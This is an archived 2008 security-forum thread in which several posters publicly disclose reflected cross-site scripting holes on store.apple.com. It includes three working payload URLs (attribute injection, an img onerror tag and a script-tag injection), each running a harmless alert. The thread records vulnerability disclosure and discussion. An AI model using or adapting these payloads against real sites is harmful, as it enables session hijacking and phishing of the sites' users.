Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
store.apple.com xss
Posted by: Kyo
Date: July 18, 2008 01:28PM

I emailed apple twice about an issue on the apple store search. They did not fix it for over a MONTH and never mailed me back either. They "fixed" it now, but they did a lousy job at it.

httx://store.apple.com/us/search?find="+onmouseover="alert(1)"

this will not work if you urlencode the "

anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out.

The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice.



Edited 3 time(s). Last edit at 07/18/2008 01:30PM by Kyo.

Options: ReplyQuote
Re: store.apple.com xss
Posted by: thrill
Date: July 18, 2008 03:28PM

shweet!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: store.apple.com xss
Posted by: rsnake
Date: August 03, 2008 10:21PM

Still works. Seriously. How lame! PCI anyone?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: store.apple.com xss
Posted by: Jiu
Date: August 04, 2008 04:20PM

http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput

without onmouseover ^^
works in Firefox 2



Edited 1 time(s). Last edit at 08/04/2008 04:20PM by Jiu.

Options: ReplyQuote
Re: store.apple.com xss
Posted by: Kyo
Date: August 04, 2008 08:27PM

huh, looks like my browser was just being weird or something. they didn't fix it...

Options: ReplyQuote
Re: store.apple.com xss
Posted by: TheInsider
Date: December 24, 2008 08:16PM

Nice guys!
Both patched, check this out...

http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script><div id="

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

Options: ReplyQuote
Re: store.apple.com xss
Posted by: DoctorDan
Date: December 25, 2008 10:34PM

Not okay! Good finds.

-Dan

Options: ReplyQuote


Sorry, only registered users may post in this forum.